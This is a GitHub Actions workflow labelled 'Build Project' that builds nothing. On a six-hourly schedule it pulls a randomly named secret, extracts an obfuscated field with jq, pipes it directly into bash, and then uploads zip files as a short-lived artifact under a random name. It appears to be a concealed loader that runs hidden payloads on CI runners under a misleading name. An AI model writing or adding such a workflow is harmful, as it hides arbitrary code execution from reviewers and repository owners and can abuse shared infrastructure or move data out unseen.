name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '58 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          ifohh12: ${{ secrets.ifohh12 }}
        run: |
          printf '%s' "$ifohh12" | jq -r .x71238 | /bin/bash
          echo $zdb40 | jq -r .k616 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: odor6Fau
          path: "*.zip"
          retention-days: 1
